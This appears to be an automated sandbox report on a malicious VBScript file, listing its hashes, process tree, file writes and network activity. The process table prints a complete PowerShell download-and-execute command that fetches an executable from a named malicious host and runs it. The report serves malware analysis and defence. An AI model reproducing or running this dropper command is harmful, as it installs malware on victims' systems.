File name: | 0a9cd2c3250fb861ff97a2cf5d0476a773bd5ab5b592650cd9777d517f50a35f.vbs |
Full analysis: | https://app.any.run/tasks/05def84d-0953-4622-b701-a5205a0f2ea2 |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 11:43:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | 4D5DDA30D65CA7C082DD553F7DEEE6FB |
SHA1: | 8C38BCBF8978C982D6A7349DE54A3211BC4A4086 |
SHA256: | 0A9CD2C3250FB861FF97A2CF5D0476A773BD5AB5B592650CD9777D517F50A35F |
SSDEEP: | 1536:NxS9gNpoJdxiVKaQH4by+NxPzo8mp+/HPA4mF67WDlqlal:NM9Yiis74VtXXY4qkQlqE |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3036 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\0a9cd2c3250fb861ff97a2cf5d0476a773bd5ab5b592650cd9777d517f50a35f.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
2380 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $edgexg = New-Object -ComObject Msxml2.XMLHTTP; $fuhycbvsf = New-Object -ComObject ADODB.Stream; $ydscysd = $env:temp + '\armsv64.exe';$edgexg.open('GET', 'http://team.hitweb.it/tes2t?70481', $false);$edgexg.send(); if($edgexg.Status -eq "200"){$fuhycbvsf.open();$fuhycbvsf.type = 1;$fuhycbvsf.write($edgexg.responseBody);$fuhycbvsf.position = 0;$fuhycbvsf.savetofile($ydscysd);$fuhycbvsf.close();} Start-Process $ydscysd; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T9H0IC4XDD13AQP05I6Y.temp | — | |
MD5:— | SHA256:— | |||
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13a7cc.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2380 | powershell.exe | GET | — | 176.10.125.81:80 | http://team.hitweb.it/tes2t?70481 | CH | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2380 | powershell.exe | 176.10.125.81:80 | team.hitweb.it | SOFTplus Entwicklungen GmbH | CH | suspicious |
Domain | IP | Reputation |
---|---|---|
team.hitweb.it |
| malicious |